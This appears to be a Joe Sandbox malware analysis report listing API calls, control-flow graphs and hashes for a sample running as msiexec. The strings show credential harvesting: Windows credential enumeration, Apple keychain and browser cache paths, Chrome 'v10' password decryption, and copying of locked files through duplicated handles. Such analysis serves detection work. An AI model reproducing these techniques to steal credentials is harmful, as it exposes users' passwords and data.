                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                    • String ID:
                                                                                                    • API String ID: 3473537107-0
                                                                                                    • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                    • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                    • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                    • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                    APIs
                                                                                                      • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                      • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                      • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                    • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                    • free.MSVCRT ref: 00418803
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 1355100292-0
                                                                                                    • Opcode ID: d2c930e6252e89cba164dd291f6fd6a93c7c4142cb300574fab5a2c635c3ca3b
                                                                                                    • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                    • Opcode Fuzzy Hash: d2c930e6252e89cba164dd291f6fd6a93c7c4142cb300574fab5a2c635c3ca3b
                                                                                                    • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                    • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$FirstNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 1690352074-0
                                                                                                    • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                    • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                    • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                    • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0041898C
                                                                                                    • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoSystemmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3558857096-0
                                                                                                    • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                    • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                    • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                    • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 43 44558e-445594 call 444b06 4->43 44 44557e-44558c call 4136c0 call 41366b 4->44 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 46 445823-445826 14->46 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 58 445879-44587c 18->58 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 77 445685 21->77 78 4456b2-4456b5 call 40b1ab 21->78 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 140 44592d-445945 call 40b6ef 24->140 141 44594a 24->141 38 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->38 39 445b29-445b32 28->39 145 4459d0-4459e8 call 40b6ef 29->145 146 4459ed 29->146 30->21 42 445609-44560d 30->42 31->30 182 445b08-445b15 call 40ae51 38->182 47 445c7c-445c85 39->47 48 445b38-445b96 memset * 3 39->48 42->21 56 44560f-445641 call 4087b3 call 40a889 call 4454bf 42->56 43->3 44->43 49 44584c-445854 call 40b1ab 46->49 50 445828 46->50 70 445d1c-445d25 47->70 71 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 47->71 63 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 48->63 64 445b98-445ba0 48->64 49->13 65 44582e-445847 call 40a9b5 call 4087b3 50->65 156 445665-445670 call 40b1ab 56->156 157 445643-445663 call 40a9b5 call 4087b3 56->157 61 4458a2-4458aa call 40b1ab 58->61 62 44587e 58->62 61->19 75 445884-44589d call 
40a9b5 call 4087b3 62->75 249 445c77 63->249 64->63 76 445ba2-445bcf call 4099c6 call 445403 call 445389 64->76 143 445849 65->143 82 445fae-445fb2 70->82 83 445d2b-445d3b 70->83 160 445cf5 71->160 161 445cfc-445d03 71->161 148 44589f 75->148 76->47 93 44568b-4456a4 call 40a9b5 call 4087b3 77->93 109 4456ba-4456c4 78->109 98 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 83->98 99 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 83->99 150 4456a9-4456b0 93->150 166 445d67-445d6c 98->166 167 445d71-445d83 call 445093 98->167 196 445e17 99->196 197 445e1e-445e25 99->197 122 4457f9 109->122 123 4456ca-4456d3 call 413cfa call 413d4c 109->123 122->6 174 4456d8-4456f7 call 40b2cc call 413fa6 123->174 140->141 141->23 143->49 145->146 146->28 148->61 150->78 150->93 156->109 157->156 160->161 171 445d05-445d13 161->171 172 445d17 161->172 176 445fa1-445fa9 call 40b6ef 166->176 167->82 171->172 172->70 207 4456fd-445796 memset * 4 call 409c70 * 3 174->207 208 4457ea-4457f7 call 413d29 174->208 176->82 202 445b17-445b27 call 40aebe 182->202 203 445aa3-445ab0 call 40add4 182->203 196->197 198 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->198 199 445e6b-445e7e call 445093 197->199 239 445e62-445e69 198->239 240 445e5b 198->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 199->220 202->39 203->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 203->221 207->208 248 445798-4457ca call 40b2cc call 409d1f call 409b98 207->248 208->10 220->82 253 445f9b 220->253 221->182 239->199 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 265 445f4d-445f5a call 40ae51 245->265 248->208 264 4457cc-4457e5 call 4087b3 248->264 249->47 253->176 264->208 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004455C2
                                                                                                    • wcsrchr.MSVCRT ref: 004455DA
                                                                                                    • memset.MSVCRT ref: 0044570D
                                                                                                    • memset.MSVCRT ref: 00445725
                                                                                                      • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                      • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                      • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                      • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                      • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                      • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                      • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                      • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                    • memset.MSVCRT ref: 0044573D
                                                                                                    • memset.MSVCRT ref: 00445755
                                                                                                    • memset.MSVCRT ref: 004458CB
                                                                                                    • memset.MSVCRT ref: 004458E3
                                                                                                    • memset.MSVCRT ref: 0044596E
                                                                                                    • memset.MSVCRT ref: 00445A10
                                                                                                    • memset.MSVCRT ref: 00445A28
                                                                                                    • memset.MSVCRT ref: 00445AC6
                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                      • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                      • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                      • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                      • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                      • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                    • memset.MSVCRT ref: 00445B52
                                                                                                    • memset.MSVCRT ref: 00445B6A
                                                                                                    • memset.MSVCRT ref: 00445C9B
                                                                                                    • memset.MSVCRT ref: 00445CB3
                                                                                                    • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                    • memset.MSVCRT ref: 00445B82
                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                    • memset.MSVCRT ref: 00445986
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                    • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                    • API String ID: 1963886904-3798722523
                                                                                                    • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                    • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                    • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                    • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                      • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                      • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                      • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                    • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                                                    • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                    • String ID: $/deleteregkey$/savelangfile
                                                                                                    • API String ID: 2744995895-28296030
                                                                                                    • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                    • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                    • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                    • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040B71C
                                                                                                      • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                      • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                    • wcsrchr.MSVCRT ref: 0040B738
                                                                                                    • memset.MSVCRT ref: 0040B756
                                                                                                    • memset.MSVCRT ref: 0040B7F5
                                                                                                    • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                    • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                    • memset.MSVCRT ref: 0040B851
                                                                                                    • memset.MSVCRT ref: 0040B8CA
                                                                                                    • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                    • memset.MSVCRT ref: 0040BB53
                                                                                                    • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                                    • String ID: chp$v10
                                                                                                    • API String ID: 4290143792-2783969131
                                                                                                    • Opcode ID: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
                                                                                                    • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                    • Opcode Fuzzy Hash: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
                                                                                                    • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                    Control-flow Graph

                                                                                                    • Control-flow graph image omitted. Basic blocks 40e2ab-40e4af; internal calls 40695d, 406b90, 4069a3, 406e8f, 406b53, 40dd50 (x7), 40aa29, 40742e, 40aa04; imports memset, wcschr, memcpy (x4), free.
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                    • free.MSVCRT ref: 0040E49A
                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                    • memset.MSVCRT ref: 0040E380
                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                    • wcschr.MSVCRT ref: 0040E3B8
                                                                                                    • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E3EC
                                                                                                    • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E407
                                                                                                    • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E422
                                                                                                    • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E43D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                    • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                    • API String ID: 3849927982-2252543386
                                                                                                    • Opcode ID: 899b02e83669360748f94f70086dc918a58d224d9254a700c01c8a4d26cdd5db
                                                                                                    • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                    • Opcode Fuzzy Hash: 899b02e83669360748f94f70086dc918a58d224d9254a700c01c8a4d26cdd5db
                                                                                                    • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                                    Control-flow Graph

                                                                                                    • Control-flow graph image omitted. Basic blocks 4091b8-409526; internal calls 40a6e6, 444432, 40b273, 438552, 4251c4, 424f26, 4253cf, 4253af, 443d90, 408f2f; imports memset, memcpy, memcmp.
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004091E2
                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                    • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                    • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                    • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                    • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                    • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3715365532-3916222277
                                                                                                    • Opcode ID: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                                                                                    • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                    • Opcode Fuzzy Hash: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                                                                                    • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                      • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                      • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                      • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                      • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                      • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                    • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                    • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                    • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
